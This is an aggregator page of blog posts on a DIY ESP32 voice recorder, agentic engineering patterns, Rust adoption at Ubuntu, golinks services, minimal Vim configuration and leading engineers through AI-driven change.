Posts in Python (20 found)

LLM Use in the Python Source Code

There is a trick that is spreading through social media. If you block the claude user on GitHub, then each time you visit a GitHub repository that has commits by this user you get a banner at the top alerting you of the user's participation. It's an easy way to spot projects that have started to rely on coding agents, in this case on Claude Code specifically. Imagine the surprise when you see that CPython , one of the most popular open-source projects in the world, is now receiving contributions from :

0 views
Stavros' Stuff 2 days ago

I made a voice note taker

Have you ever always wanted a very very small voice note recorder that would fit in your pocket? Something that would always work, and always be available to take a note at the touch of a button, with no fuss? Me neither. Until, that is, I saw the Pebble Index 01 , then I absolutely needed it right away and had to have it in my life immediately, but alas, it is not available, plus it’s disposable, and I don’t like creating e-waste. What was a poor maker like me supposed to do when struck down so cruelly by the vicissitudes of fate? There was only one thing I could do: I could build my own, shitty version of it for $8, and that’s exactly what I did. Like everyone else, I have some sort of undiagnosed ADHD, which manifests itself as my brain itching for a specific task, and the itch becoming unbearable unless I scratch it. This usually results in me getting my phone out, no matter where I am or who I’m with, and either noting stuff down or doing the task, which some people perceive as rude, for inexplicable reasons that are almost certainly their fault. Because, however, it has proved easier to just not get my phone out in polite company than convince everyone of how wrong they are, I just do the former now, but that makes the itch remain. Also, sometimes I’m just in the middle of something, and an idea pops into my head for later pursuit, but I get distracted by a squirrel, a car going by, or the disturbing trend of the constant and persistent erosion of civil rights all over the world, and I forget the idea. The Pebble Index showed me that there’s a better way, a device that’s unobtrusive, available, and reliable enough that I could just press a button, speak into it, and know for sure that my sonorous voice would reach the bowels of my phone, where it would be stored safely until I was bored and wanted something to do. I didn’t want to have to get my phone out, unlock it, open a voice recorder app, hold down a button, speak, wonder if it heard me, look at the button, realize I had already pressed it, press it again, say the thing again, press it again to stop, exit the app, lock my phone, and put it back into my pocket. I wanted to take a thing out, press a button, speak, release the button, done. The initial thinking was that I’d use a microcontroller (an ESP32 is my microcontroller of choice these days), a microphone, and a lithium battery, and that’s basically all the hardware this needs! Most of the heavy lifting would need to be done in software. This would need: Luckily, I know enough about electronics to know that LLMs would definitely know how to build something like that. Indeed, Claude confirmed my suspicions by saying that all I need is a microphone and an ESP32. It recommended an ESP32-C6 but I went with an ESP32-S3 , as it had an onboard charge controller and would be able to charge a lithium battery from USB, which is very handy when you’re making a thing that runs on battery. The ESP32 is a microcontroller, a little computer that’s just really small. The main difference of the S3 from the C6 is that the S3 is more capable, and has more power. I keep an assortment of random components around, so I had an ESP32-S3 board. It’s a no-name, crappy one from AliExpress, not a good, Seeed-branded one from AliExpress, but it would have to do. Unfortunately, I didn’t have a MEMS microphone (which is basically an angelic grain of rice that can hear, with excellent quality), but I did have an electret mic, which is huge and bad quality and would sound like an old-timey radio, but it was there and it was ready and it was willing, and after a few beers it seemed like it was right, or at least right for right now. I also had a very thin LiPo battery, which would suit very well. For the final device I’d want a battery that’s a tiny bit shorter, as this one was around 40% longer than the ESP32, but it would do great for now. I quickly soldered everything together and recorded some audio. It worked! It worked and nobody was going to take that from me, even though it was crackly and the quality wasn’t great. Unfortunately, at this stage I realized that the analog electret microphone consumes too much energy, even when sleeping, which is terrible on a device that would spend more time sleeping than the beauty from that fairytale, Sleepy the Dwarf. To counteract that, I decided to use a MOSFET to cut power to the mic when the device was asleep. A MOSFET is a little switch that you can turn on and off from a microcontroller, basically. Full disclosure here, before using the MOSFET to turn the mic on and off, I went down a multi-hour rabbit hole trying to design a latching circuit that would allow the ESP32 to turn itself off and consume almost no power. Instead, it consumed a lot of my time, without anything to show for it, because I didn’t manage to make it work at all. The MOSFET for the mic worked fairly well, though, and the device didn’t consume much power when asleep. The real gains, however, were going to be had when the MEMS microphone I ordered arrived, as those use infinitesimal amounts of current when asleep, and have much better sound quality as well, as they are digital. The analog microphone crackled and popped and took a while to stabilize after boot, which was unfortunate because I wanted the device to be ready as soon as the user pressed the button. There was also a recording bug where the recording was missing a few milliseconds of audio every so often, which led to dropped phonemes and words sometimes sounding like other words because parts of them were dropped. All these problems were weird enough and hard enough to debug that I resolved to just wait for my digital MEMS microphone to arrive, which would solve them in one fell swoop, as it is digital and amazing. After the relatively easy part of connecting a few wires together, now came the hard part: Designing a case for the whole thing that would fit without leaving much empty space, to make the device as small as possible. This was very hard to do with this massive microphone that was as tall as everything else (including battery) combined. I initially tried to point the microphone downward while mounting it at the top, so it would take up the least amount of vertical space possible, but the PCB made that hard, as the microphone was soldered to it. I ended up desoldering the mic from the PCB, trimming the PCB to make it shorter, and connecting the mic to it with wires. That allowed me to make the case (and thus the device) smaller, but at what cost? Nothing, turns out, because it worked great. The device was working great, but I didn’t want it tethered to my computer, I wanted to be able to take it out and about and show it the wonders of the world. To do this, I needed Bluetooth. Unfortunately, I have exactly zero idea how Bluetooth works, and would need to spend days or weeks figuring stuff out, but, luckily for me, I had a Claude subscription. It took a bit of back-and-forth, but I did manage to end up with a Python script that would connect to the pendant, download the audio files, and convert them from ADPCM to MP3, for expanded compatibility. To maximize battery life, the way things worked was: This worked really well, the device was awake for a small amount of time (10 seconds), but it could be awoken at any time just by tapping the button. At that point, it would transfer to the PC any files that were on the pendant, and go back to sleep. One downside was that transfers would take an inordinate amount of time, sometimes reaching 2 minutes for a 10-second clip. OpenAI’s Codex was really helpful here, finding a solution for fast BLE transfers that made sending files 100x faster than it was before. Because I’m too impatient to wait for the slow boat from China, I ordered the same microphone locally. I had to pay an arm and a leg in shipping and impatience fees, but it was worth it, because I finally had a MEMS mic! It’s so cute and tiny, I immediately found a spot for it over the board, added the switch, added a voltage divider for sensing battery voltage, and that was it! The new mic sounds fantastic, it sounds better than recording with your phone, for some odd reason that I’m sure is all in my head. What’s more, it doesn’t have the weird bugs that plagued me with the analog mic. With this smaller mic, I could now design a better case. I designed the case you see on the right, which is the second generation. There will be a third, when I receive the shorter battery, which means I will have a choice of either making the device longer but half as thick, or around 40% shorter. I think I will go for longer but thinner, I’d quite prefer to have a thin device in my pocket, even if it’s long, than a stubby one that pokes out. Still, the new battery (and the new case) will mark the completion of this project and make me a very happy man. For the second-gen case, I decided to jazz it up and add a red stripe around it, because it was easy to do and because I think it looks good. Unfortunately, the feature I wanted most (fillets, i.e. rounded corners) wasn’t possible due to the lack of empty space inside the case. I hope the final device will have some more space for fillets, at least. Once I was done with the device, it was time to make it more ergonomic: I’d need to create an Android app so I wouldn’t have to wait to get to my PC. I also knew I wanted note transcription, as it’s really useful to be able to see what you said without having to listen to the audio again. Unfortunately again, I have no idea about Android development, only having written a small app years ago. Fortunately, though, Claude turned out to be pretty good at it, and one-shotted this app that you see here. For the transcription, I used GPT-4o Transcribe, which is great and understands both English and Greek, languages I fail to speak in equal measure. I have to say, it’s pretty magical to speak into a little box and to see the audio already captured and transcribed on your phone. With the Android app, I could now test the device in real-world use. One thing I noticed is that battery dies way too fast. I suspect that has something to do with the cheap board, so I’ve ordered an original Seeed Xiao board, and I hope that will fix the problem once and for all, as they advertise low power usage and they’re a trustworthy brand. I also added a “webhook” convenience function to the Android app, so that the latter would be able to send the transcription to a server for further processing. The device is extremely reliable, which makes me a lot more likely to use it. I know that, if I press the button, the audio will be recorded and stored, and nothing will happen to it, which makes for a very relaxed and calming experience. Before I continue, I want to say you can find all the files in this project (firmware, Android app, whatever else) in its GitHub repository: https://github.com/skorokithakis/middle That’s right, I called it Middle, because it was the next thing after the Index. I know it’s a silly name, I don’t care, don’t use it, I’m not changing it. In the “draw the rest of the fucking owl” portion of this article, I realized I didn’t want the notes to just go to my phone when LLMs exist. I wanted an LLM to take the notes and do something with them, so I spent a few weeks writing an AI agent that’s more useful than what currently exists. The device’s Android app sends the transcribed text to this AI, which processes it. I’m going to write another post about this, but basically, I wanted an AI personal assistant that could help with all the little chores in my life. AI assistants are interesting because they’re: This means that, when everyone inevitably asks “what is it good for”, I can’t really give a good answer, because the answer is “it takes care of all the little annoyances for me”, but nobody has the same annoyances and can’t really imagine what the bot does, so they don’t engage with it. The amazing thing for AI assistants for me is the fact that they can string together multiple (otherwise small) tools to do something that’s more valuable than the sum of its parts. For example, I asked the agent to give me a daily briefing every morning, consisting of my todos for the day, my calendar events, whether any refund has hit my bank, and whether any packages are due to be delivered today. The agent also checks my gym bookings and asks me every morning if I do plan to go, or if I intend to cancel. If I tell it to cancel, it does, but if I say I’ll go, it sets an alarm for a few minutes before, which I’m much more likely to see than my calendar’s one. It will also (entirely of its own volition) mention things like “you have a gym booking today 7-8pm but you have a restaurant booking at 9pm and it’ll take you more than an hour to shower and make it”, which a regular calendar wouldn’t be able to figure out. I’ve made it fantastically secure, everything is sandboxed and you can run it on your laptop without fear. I use it constantly throughout the day for many little things, and the integration with the device takes the whole setup to another level. You can find the bot here: https://github.com/skorokithakis/stavrobot Do let me know if you try it, it’s like OpenClaw but won’t steal your data and eat your firstborn. If you have any ideas, feedback, flamebait, or whatever, you can Tweet or Bluesky me, or email me directly. A way for the device to record audio onto some sort of persistent storage, for the case where you didn’t have your phone close to you. A way for the device to sleep, consuming almost no power, until it was woken up by the button. A way to transfer the files from the device to the phone, for later listening. A battery indicator would be very nice, so I knew when to recharge it. You pressed the button. If you held it down for more than half a second, the recording would “count”. If there was a recording made (i.e. if you held the button down long enough), it would be saved. Bluetooth would turn on and look for a phone or computer that’s ready to receive. The device would send the file and go to sleep again. Very open-ended tools, and Highly personal.

0 views
Simon Willison 6 days ago

Writing about Agentic Engineering Patterns

I've started a new project to collect and document Agentic Engineering Patterns - coding practices and patterns to help get the best results out of this new era of coding agent development we find ourselves entering. I'm using Agentic Engineering to refer to building software using coding agents - tools like Claude Code and OpenAI Codex, where the defining feature is that they can both generate and execute code - allowing them to test that code and iterate on it independently of turn-by-turn guidance from their human supervisor. I think of vibe coding using its original definition of coding where you pay no attention to the code at all, which today is often associated with non-programmers using LLMs to write code. Agentic Engineering represents the other end of the scale: professional software engineers using coding agents to improve and accelerate their work by amplifying their existing expertise. There is so much to learn and explore about this new discipline! I've already published a lot under my ai-assisted-programming tag (345 posts and counting) but that's been relatively unstructured. My new goal is to produce something that helps answer the question "how do I get good results out of this stuff" all in one place. I'll be developing and growing this project here on my blog as a series of chapter-shaped patterns, loosely inspired by the format popularized by Design Patterns: Elements of Reusable Object-Oriented Software back in 1994. I published the first two chapters today: I hope to add more chapters at a rate of 1-2 a week. I don't really know when I'll stop, there's a lot to cover! I have a strong personal policy of not publishing AI-generated writing under my own name. That policy will hold true for Agentic Engineering Patterns as well. I'll be using LLMs for proofreading and fleshing out example code and all manner of other side-tasks, but the words you read here will be my own. Agentic Engineering Patterns isn't exactly a book , but it's kind of book-shaped. I'll be publishing it on my site using a new shape of content I'm calling a guide . A guide is a collection of chapters, where each chapter is effectively a blog post with a less prominent date that's designed to be updated over time, not frozen at the point of first publication. Guides and chapters are my answer to the challenge of publishing "evergreen" content on a blog. I've been trying to find a way to do this for a while now. This feels like a format that might stick. If you're interested in the implementation you can find the code in the Guide , Chapter and ChapterChange models and the associated Django views , almost all of which was written by Claude Opus 4.6 running in Claude Code for web accessed via my iPhone. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . Writing code is cheap now talks about the central challenge of agentic engineering: the cost to churn out initial working code has dropped to almost nothing, how does that impact our existing intuitions about how we work, both individually and as a team? Red/green TDD describes how test-first development helps agents write more succinct and reliable code with minimal extra prompting.

0 views
baby steps 6 days ago

What it means that Ubuntu is using Rust

Righty-ho, I’m back from Rust Nation, and busily horrifying my teenage daughter with my (admittedly atrocious) attempts at doing an English accent 1 . It was a great trip with a lot of good conversations and some interesting observations. I am going to try to blog about some of them, starting with some thoughts spurred by Jon Seager’s closing keynote, “Rust Adoption At Scale with Ubuntu”. For some time now I’ve been debating with myself, has Rust “crossed the chasm” ? If you’re not familiar with that term, it comes from a book that gives a kind of “pop-sci” introduction to the Technology Adoption Life Cycle . The answer, of course, is it depends on who you ask . Within Amazon, where I have the closest view, the answer is that we are “most of the way across”: Rust is squarely established as the right way to build at-scale data planes or resource-aware agents and it is increasingly seen as the right choice for low-level code in devices and robotics as well – but there remains a lingering perception that Rust is useful for “those fancy pants developers at S3” (or wherever) but a bit overkill for more average development 3 . On the other hand, within the realm of Safety Critical Software, as Pete LeVasseur wrote in a recent rust-lang blog post , Rust is still scrabbling for a foothold. There are a number of successful products but most of the industry is in a “wait and see” mode, letting the early adopters pave the path. The big idea that I at least took away from reading Crossing the Chasm and other references on the technology adoption life cycle is the need for “reference customers”. When you first start out with something new, you are looking for pioneers and early adopters that are drawn to new things: What an early adopter is buying [..] is some kind of change agent . By being the first to implement this change in the industry, the early adopters expect to get a jump on the competition. – from Crossing the Chasm But as your technology matures, you have to convince people with a lower and lower tolerance for risk: The early majority want to buy a productivity improvement for existing operations. They are looking to minimize discontinuity with the old ways. They want evolution, not revolution. – from Crossing the Chasm So what is most convincing to people to try something new? The answer is seeing that others like them have succeeded. You can see this at play in both the Amazon example and the Safety Critical Software example. Clearly seeing Rust used for network services doesn’t mean it’s ready to be used in your car’s steering column 4 . And even within network services, seeing a group like S3 succeed with Rust may convince other groups building at-scale services to try Rust, but doesn’t necessarily persuade a team to use Rust for their next CRUD service. And frankly, it shouldn’t! They are likely to hit obstacles. All of this was on my mind as I watched the keynote by Jon Seager, the VP of Engineering at Canonical, which is the company behind Ubuntu. Similar to Lars Bergstrom’s epic keynote from year’s past on Rust adoption within Google, Jon laid out a pitch for why Canonical is adopting Rust that was at once visionary and yet deeply practical . “Visionary and yet deeply practical” is pretty much the textbook description of what we need to cross from early adopters to early majority . We need folks who care first and foremost about delivering the right results, but are open to new ideas that might help them do that better; folks who can stand on both sides of the chasm at once. Jon described how Canonical focuses their own development on a small set of languages: Python, C/C++, and Go, and how they had recently brought in Rust and were using it as the language of choice for new foundational efforts , replacing C, C++, and (some uses of) Python. Jon talked about how he sees it as part of Ubuntu’s job to “pay it forward” by supporting the construction of memory-safe foundational utilities. Jon meant support both in terms of finances – Canonical is sponsoring the Trifecta Tech Foundation’s to develop sudo-rs and ntpd-rs and sponsoring the uutils org’s work on coreutils – and in terms of reputation. Ubuntu can take on the risk of doing something new, prove that it works, and then let others benefit. Remember how the Crossing the Chasm book described early majority people? They are “looking to minimize discontinuity with the old ways”. And what better way to do that than to have drop-in utilities that fit within their existing workflows. With new adoption comes new perspectives. On Thursday night I was at dinner 5 organized by Ernest Kissiedu 6 . Jon Seager was there along with some other Rust adopters from various industries, as were a few others from the Rust Foundation and the open-source project. Ernest asked them to give us their unvarnished takes on Rust. Jon made the provocative comment that we needed to revisit our policy around having a small standard library. He’s not the first to say something like that, it’s something we’ve been hearing for years and years – and I think he’s right! Though I don’t think the answer is just to ship a big standard library. In fact, it’s kind of a perfect lead-in to (what I hope will be) my next blog post, which is about a project I call “battery packs” 7 . The broader point though is that shifting from targeting “pioneers” and “early adopters” to targeting “early majority” sometimes involves some uncomfortable changes: Transition between any two adoption segments is normally excruciatingly awkward because you must adopt new strategies just at the time you have become most comfortable with the old ones. [..] The situation can be further complicated if the high-tech company, fresh from its marketing success with visionaries, neglects to change its sales pitch. [..] The company may be saying “state-of-the-art” when the pragmatist wants to hear “industry standard”. – Crossing the Chasm (emphasis mine) Not everybody will remember it, but in 2016 there was a proposal called the Rust Platform . The idea was to bring in some crates and bless them as a kind of “extended standard library”. People hated it. After all, they said, why not just add dependencies to your ? It’s easy enough. And to be honest, they were right – at least at the time. I think the Rust Platform is a good example of something that was a poor fit for early adopters, who want the newest thing and don’t mind finding the best crates, but which could be a great fit for the Early Majority. 8 Anyway, I’m not here to argue for one thing or another in this post, but more for the concept that we have to be open to adapting our learned wisdom to new circumstances. In the past, we were trying to bootstrap Rust into the industry’s consciousness – and we have succeeded. The task before us now is different: we need to make Rust the best option not just in terms of “what it could be ” but in terms of “what it actually is ” – and sometimes those are in tension. Later in the dinner, the talk turned, as it often does, to money. Growing Rust adoption also comes with growing needs placed on the Rust project and its ecosystem. How can we connect the dots? This has been a big item on my mind, and I realize in writing this paragraph how many blog posts I have yet to write on the topic, but let me lay out a few interesting points that came up over this dinner and at other recent points. First, there are more ways to offer support than $$. For Canonical specifically, as they are an open-source organization through-and-through, what I would most want is to build stronger relationships between our organizations. With the Rust for Linux developers, early on Rust maintainers were prioritizing and fixing bugs on behalf of RfL devs, but more and more, RfL devs are fixing things themselves, with Rust maintainers serving as mentors. This is awesome! Second, there’s an interesting trend about $$ that I’ve seen crop up in a few places. We often think of companies investing in the open-source dependencies that they rely upon. But there’s an entirely different source of funding, and one that might be even easier to tap, which is to look at companies that are considering Rust but haven’t adopted it yet. For those “would be” adopters, there are often individuals in the org who are trying to make the case for Rust adoption – these individuals are early adopters, people with a vision for how things could be, but they are trying to sell to their early majority company. And to do that, they often have a list of “table stakes” features that need to be supported; what’s more, they often have access to some budget to make these things happen. This came up when I was talking to Alexandru Radovici, the Foundation’s Silver Member Directory, who said that many safety critical companies have money they’d like to spend to close various gaps in Rust, but they don’t know how to spend it. Jon’s investments in Trifecta Tech and the uutils org have the same character: he is looking to close the gaps that block Ubuntu from using Rust more. Well, first of all, you should watch Jon’s talk. “Brilliant”, as the Brits have it. But my other big thought is that this is a crucial time for Rust. We are clearly transitioning in a number of areas from visionaries and early adopters towards that pragmatic majority, and we need to be mindful that doing so may require us to change some of the way that we’ve always done things. I liked this paragraph from Crossing the Chasm : To market successfully to pragmatists, one does not have to be one – just understand their values and work to serve them. To look more closely into these values, if the goal of visionaries is to take a quantum leap forward, the goal of pragmatists is to make a percentage improvement–incremental, measurable, predictable progress. [..] To market to pragmatists, you must be patient. You need to be conversant with the issues that dominate their particular business. You need to show up at the industry-specific conferences and trade shows they attend. Re-reading Crossing the Chasm as part of writing this blog post has really helped me square where Rust is – for the most part, I think we are still crossing the chasm, but we are well on our way. I think what we see is a consistent trend now where we have Rust champions who fit the “visionary” profile of early adopters successfully advocating for Rust within companies that fit the pragmatist, early majority profile. It strikes me that open-source is just an amazing platform for doing this kind of marketing. Unlike a company, we don’t have to do everything ourselves. We have to leverage the fact that open source helps those who help themselves – find those visionary folks in industries that could really benefit from Rust, bring them into the Rust orbit, and then (most important!) support and empower them to adapt Rust to their needs. This last part may sound obvious, but it’s harder than it sounds. When you’re embedded in open source, it seems like a friendly place where everyone is welcome. But the reality is that it can be a place full of cliques and “oral traditions” that “everybody knows” 9 . People coming with an idea can get shutdown for using the wrong word. They can readily mistake the, um, “impassioned” comments from a random contributor (or perhaps just a troll…) for the official word from project leadership. It only takes one rude response to turn somebody away. So what will ultimately help Rust the most to succeed? Empathy in Open Source . Let’s get out there, find out where Rust can help people, and make it happen. Exciting times! I am famously bad at accents. My best attempt at posh British sounds more like Apu from the Simpsons. I really wish I could pull off a convincing Greek accent, but sadly no.  ↩︎ Another of my pearls of wisdom is “there is nothing more permanent than temporary code”. I used to say that back at the startup I worked at after college, but years of experience have only proven it more and more true.  ↩︎ Russel Cohen and Jess Izen gave a great talk at last year’s RustConf about what our team is doing to help teams decide if Rust is viable for them. But since then another thing having a big impact is AI, which is bringing previously unthinkable projects, like rewriting older systems, within reach.  ↩︎ I have no idea if there is code in a car’s steering column, for the record. I assume so by now? For power steering or some shit?  ↩︎ Or am I supposed to call it “tea”? Or maybe “supper”? I can’t get a handle on British mealtimes.  ↩︎ Ernest is such a joy to be around. He’s quiet, but he’s got a lot of insights if you can convince him to share them. If you get the chance to meet him, take it! If you live in London, go to the London Rust meetup! Find Ernest and introduce yourself. Tell him Niko sent you and that you are supposed to say how great he is and how you want to learn from the wisdom he’s accrued over the years. Then watch him blush. What a doll.  ↩︎ If you can’t wait, you can read some Zulip discussion here.  ↩︎ The Battery Packs proposal I want to talk about is similar in some ways to the Rust Platform, but decentralized and generally better in my opinion– but I get ahead of myself!  ↩︎ Betteridge’s Law of Headlines has it that “Any headline that ends in a question mark can be answered by the word no ”. Well, Niko’s law of open-source 2 is that “nobody actually knows anything that ’everybody’ knows”.  ↩︎ I am famously bad at accents. My best attempt at posh British sounds more like Apu from the Simpsons. I really wish I could pull off a convincing Greek accent, but sadly no.  ↩︎ Another of my pearls of wisdom is “there is nothing more permanent than temporary code”. I used to say that back at the startup I worked at after college, but years of experience have only proven it more and more true.  ↩︎ Russel Cohen and Jess Izen gave a great talk at last year’s RustConf about what our team is doing to help teams decide if Rust is viable for them. But since then another thing having a big impact is AI, which is bringing previously unthinkable projects, like rewriting older systems, within reach.  ↩︎ I have no idea if there is code in a car’s steering column, for the record. I assume so by now? For power steering or some shit?  ↩︎ Or am I supposed to call it “tea”? Or maybe “supper”? I can’t get a handle on British mealtimes.  ↩︎ Ernest is such a joy to be around. He’s quiet, but he’s got a lot of insights if you can convince him to share them. If you get the chance to meet him, take it! If you live in London, go to the London Rust meetup! Find Ernest and introduce yourself. Tell him Niko sent you and that you are supposed to say how great he is and how you want to learn from the wisdom he’s accrued over the years. Then watch him blush. What a doll.  ↩︎ If you can’t wait, you can read some Zulip discussion here.  ↩︎ The Battery Packs proposal I want to talk about is similar in some ways to the Rust Platform, but decentralized and generally better in my opinion– but I get ahead of myself!  ↩︎ Betteridge’s Law of Headlines has it that “Any headline that ends in a question mark can be answered by the word no ”. Well, Niko’s law of open-source 2 is that “nobody actually knows anything that ’everybody’ knows”.  ↩︎

0 views
Justin Duke 6 days ago

Golinks

If you've never encountered golinks before: they're short, memorable URLs that redirect to longer ones. Instead of telling a coworker "the dashboard is at ," you just say . Instead of bookmarking seventeen different Notion pages, you type or or and trust that you'll end up in the right place. I discovered them at Stripe, though I believe they were invented at Google, and I have not stopped using them since. One thing leads to another. You decide that you no longer need Tailscale because the main reason you spun up Tailscale was for a project that ended up shipping — and therefore spending per-seat pricing on a service that you literally only use for golinks seems a bit silly and prohibitive. 1 Side note: I still really love Tailscale and think it's a great product and would be shocked if we aren't using it again by the end of the year. But! And then you need to find a replacement for golinks, and you cannot get dragged back to golinks.io or Trotto, both of which are slow, cumbersome, and expensive besides. So what was I to do? First, I looked at the open source options, none of which struck me as particularly compelling. I have a set of requirements that I don't think are esoteric, but others might: And nothing quite fit the bill. I had a revelation: I discovered that you could use a default search engine as the routing proxy instead of or DNS interception like Tailscale's MagicDNS. For a week or two, I had this sitting within Django in our monorepo out of ease — simply intercept any incoming search query, redirect it if something's already in the database, and then if it's not but it looks like it could be, send to the empty state prompting the user to create a golink. But frankly, this was just slower than I wanted. Not for any interesting reason, but just the usual Python request-response lifecycle stuff. I could, of course, invest in making it better and faster and was planning on doing so, but figured I would take one last trip around the internet to see if there was some other solution that I somehow missed. And that's when I discovered GoToTools . There is nothing really interesting to say about this product besides the fact that it is very good for what it does. Its author appears to have built it out of the same frustration that I had. And the highest compliment I can give it is that in a year where I've already cut down substantially on the number of services I pay for — in favor of those that I vend — I have absolutely no compunction about starting to use this. The pricing is extraordinary. The performance is really good. It works and is fast and lets me not spend time thinking about golinks and instead lets me spend time using them. A reasonable price Persistence The ability to use golinks without a Chrome extension Performance

0 views
(think) 1 weeks ago

How to Vim: Build your .vimrc from Scratch

People often think that getting started with Vim means spending hours crafting an elaborate with dozens of plugins. In reality, modern Vim (9+) and Neovim ship with remarkably sane defaults, and you can get very far with a configuration that’s just a few lines long – or even no configuration at all. If you launch Vim 9 without a file, it automatically loads – a built-in configuration that provides a solid foundation. Here’s what you get for free: That’s actually a pretty reasonable editing experience out of the box! You can read the full details with . Neovim goes even further with its defaults – it enables (copies indentation from the previous line), (highlights all search matches), (makes Tab smarter at the start of a line), (reloads files changed outside the editor), always shows the statusline, and sets the command history to 10000 entries, among many other things. If you’re on Neovim, the out-of-the-box experience is excellent. See for the full list. Here’s something that trips up a lot of people: the moment you create a file – even an empty one – Vim stops loading entirely. That means you lose all those nice defaults. The fix is simple. Start your with: This loads the defaults first, and then your own settings override or extend them as needed. This gotcha only applies to Vim. Neovim’s defaults are always active regardless of whether you have an or . Here’s a minimal that builds on the defaults and adds a few things most people want: That’s five settings on top of the defaults. You might not even need all of them – already handles the fundamentals. For Neovim, you don’t need the line – all the equivalents are already active. You also get , , and for free, so the only settings left to add are the ones that are genuinely personal preference: One of the most underappreciated aspects of Vim is how much built-in support it ships for programming languages. When is active (which it is via or Neovim’s defaults), you automatically get: This means that when you open a Python file, Vim already knows to use 4-space indentation. Open a Ruby file and it switches to 2 spaces. Open a Makefile and it uses tabs. All without a single plugin or line of configuration. You can check what’s available with for syntax files or for filetype plugins. The list is impressively long. At some point you’ll probably want more than the bare minimum. Here are a few things worth considering as your next steps: And when you eventually want more plugins, you probably won’t need many. A fuzzy finder, maybe a Git integration, and perhaps a completion engine will cover most needs. But that’s a topic for another day. The key takeaway is this: don’t overthink your . Start with the defaults, add only what you actually need, and resist the urge to copy someone else’s 500-line configuration. A small, well-understood configuration beats a large, cargo-culted one every time. That’s part of the reason why when I started to re-learn Vim I’ve opted to slowly build a Vim 9 configuration from scratch, instead of jumping to something like Neovim + Kickstart.nvim or LazyVim right away. Less is more. Understanding the foundations of your editor matters. 1 Right now my is just 100 lines and I don’t foresee it becoming much bigger in the long run. If you want to see just how far you can go without plugins, I highly recommend the Thoughtbot talk How to Do 90% of What Plugins Do (With Just Vim) . It’s a great demonstration of Vim’s built-in capabilities for file finding, auto-completion, tag navigation, and more. That’s all I have for you today. Keep hacking! I guess this sounds strange coming from the author of Emacs Prelude, right?  ↩︎ – syntax highlighting – filetype detection, language-specific plugins, and automatic indentation – incremental search (results appear as you type) – keeps 5 lines of context around the cursor – shows instead of hiding truncated lines – mouse support in all modes remapped to (text formatting) instead of the mostly useless Ex mode And several other quality-of-life improvements Syntax highlighting for hundreds of languages – Vim ships with around 770+ syntax definitions Language-specific indentation rules for over 420 file types Filetype plugins that set sensible options per language (e.g., , , ) A colorscheme – Vim ships with several built-in options (try followed by Tab to see them). Recent Vim builds even bundle Catppuccin – a beautiful pastel theme that I’m quite fond of. Another favorite of mine is Tokyo Night , which you’ll need to install as a plugin. Neovim’s default colorscheme has also been quite good since 0.10. Persistent undo – lets you undo changes even after closing and reopening a file. A game changer. Clipboard integration – makes yank and paste use the system clipboard by default. vim-unimpaired – if you’re on classic Vim (not Neovim), I think Tim Pope’s vim-unimpaired is essential. It adds a consistent set of / mappings for navigating quickfix lists, buffers, adding blank lines, and much more. Neovim 0.11+ has adopted many of these as built-in defaults, but on Vim there’s no substitute. I guess this sounds strange coming from the author of Emacs Prelude, right?  ↩︎

0 views
Evan Hahn 1 weeks ago

Track Zelda release anniversaries in your calendar

The original Legend of Zelda came out 40 years ago today. With other birthdays on the horizon, like Twilight Princess ’s 20th in November, I wanted a calendar that showed the anniversary of every Zelda game. So I made one. Subscribe to this URL in your calendar app: Once you do, you’ll get calendar events on the anniversary of each game’s release. For example, you’ll be able to see that the Oracle games turn 25 in less than a week…I feel old. If you want to build this file yourself, I wrote a little Python script that generates an ICS file from a CSV of release dates .

0 views

Leading Without a Map

No one can deny that our industry is in a period of great change. This industry never stops, and the rate goes up and down but change is a constant. Like it or not " change calls the tune we dance to ." One of the biggest reasons people resist change, even people who joined the software business to "change the world" is when they feel it threatens their self-perception and identity. In the west our job is often the primary piece of our identity. One sees it everywhere. Your LinkedIn profile has your name first, and some sort of job title or role description second. Heck even contestants on Jeopardy are introduced as "A marketing consultant from Eyebrow, Saskatchewan ." When completing the sentence "I am a..." most people pick their job. When change is high, that self-conception can quickly feel under threat. Even in the small it can happen. Your company decides they'd be better served writing new code in Java rather than Python or Ruby, you can expect a few "Pythonistas" or "Rubyists" to push back. In their heart of hearts they may agree with the decision on its merits but they nevertheless feel that their very identity is under threat. This can also include their social group/community/tribe membership, something that humans are genetically programmed to value and protect. So it's no doubt understandable that change can bring out strange and unpredictable behaviour in people when they feel like there's risk to their identity, self concept, or tribal membership. Well, first of all, acknowledge to ourselves that we are not immune from these phenomena either. Presumably most of us started out as software developers ourselves and when we started managing the people who did the job, it was the job we used to do so we got it. Over time, that's drifted. New frameworks and paradigms have emerged, new 'best' practices replaced the old 'best' practices and we became less intimately familiar with the day-to-day things our people were doing. This is uncomfortable at times, but we adapt. We learn what we can to stay involved at the right level and to coach and guide the people we're responsible for. Now, the game is changing in a much more fundamental and profound way. And it's happening fast. I don't know what the job of software developer is going to look like in a year from now (or even 6 months for that matter) and, frankly, neither does anyone else. This makes the job of manager much much harder. Your people are used to you having at least some concept of a map and sharing it with them and you don't have one. Everyone's figuring it out together. A good friend and former colleague once described an aspect of leadership as "smiling while the sky is falling." I'm not sure if he came up with it or if I should attribute it to someone else but I heard it from him first. My point here isn't that the sky is falling but rather, when your people are worried, you need to appear steadfast or you make the problem worse. You don't owe them certainty , because that would be dishonest and they'll clock your dishonesty whether they admit it or not. But just like in incident response, panic serves no one . You owe them calm reassurance that you're going to navigate this new world together and that you've got their best-interests at heart. You do this even though you might be feeling the same threat to your identity. You manage engineers but they're becoming some kind of new thing; bot-wranglers. Some of your other responsibilities are being offloaded to LLMs and everyone's role is going to keep changing until things inevitably settle down again (relatively speaking). With no playbook, we need some kind of framework for decision making. This is where we can fall back to 'first principles'. For me these are the things I hold important. Really, the basics: It sounds simple, and really, it is. Taking care of the people right now means recognizing that they're feeling that identity risk. The worst thing you can do is try to talk them out of it or convince them they're not feeling what they're feeling. Acknowledge that things are changing. Maintain ' esprit de corps ' as best you can. Draw on your experience navigating big changes before. If you've been around this industry for any amount of time, you've been through some big paradigm shifts and come out the other side. Tell some stories, but don't make it all about you. The business and customer angles come down to maintaining consistent principles around what software gets shipped to customers. I personally have the pleasing-to-nobody opinion that LLM coding tools are useful but not risk-free. Surely you have some skeptics in your midst who feel the same. Don't dismiss them either. Security, quality, maintainability, incident response, and the work-life balance of your people are still the responsibility of the humans running the company. That's the job right now, however the machinery of it changes. Keep taking care of your people and customers, like you always have. You already know how. " Statue of Captain George Vancouver, anchors and the Custom House, King's Lynn " by ell brown is licensed under CC BY 2.0 . Like this? Please feel free to share it on your favourite 